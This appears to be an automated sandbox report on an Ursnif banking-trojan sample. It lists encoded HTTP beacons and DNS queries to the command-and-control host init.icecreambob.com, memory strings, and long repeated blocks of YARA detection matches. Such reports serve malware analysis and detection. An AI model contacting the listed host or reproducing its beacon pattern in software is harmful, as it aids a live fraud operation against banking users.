                      Source: global trafficHTTP traffic detected: GET /c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 00000010.00000003.470111978.00000225DF294000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: unknownDNS traffic detected: queries for: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
